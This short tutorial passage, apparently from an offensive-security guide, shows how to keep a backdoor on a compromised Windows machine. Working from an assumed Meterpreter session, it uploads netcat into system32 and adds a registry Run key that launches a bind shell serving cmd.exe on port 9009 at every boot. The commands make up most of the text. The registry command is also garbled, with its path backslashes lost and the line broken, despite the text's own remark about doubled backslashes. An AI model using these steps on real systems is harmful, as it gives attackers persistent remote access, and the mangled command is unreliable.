We've seen the easy way to transfer files over the LAN with SimpleHTTPServer. This time, we're assuming a Meterpreter foothold has been established and we're just setting up a quicker, callback number.

Use the upload command to get your backdoor on to the target. Next, the part that makes this happen with every boot: adding the executable to the registry. Note the double backslashes to avoid the break the single backslash normally represents:

> upload /usr/share/windows-binaries/nc.exe C:\Windows\system32
> reg setval -k HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run -v nc -d 'C:Windowssystem32
c.exe -Ldp 9009 -e cmd.exe'

Note that the actual command for execution at boot time is nc.exe -Ldp 9009 -e cmd.exe. Don't forget that port number.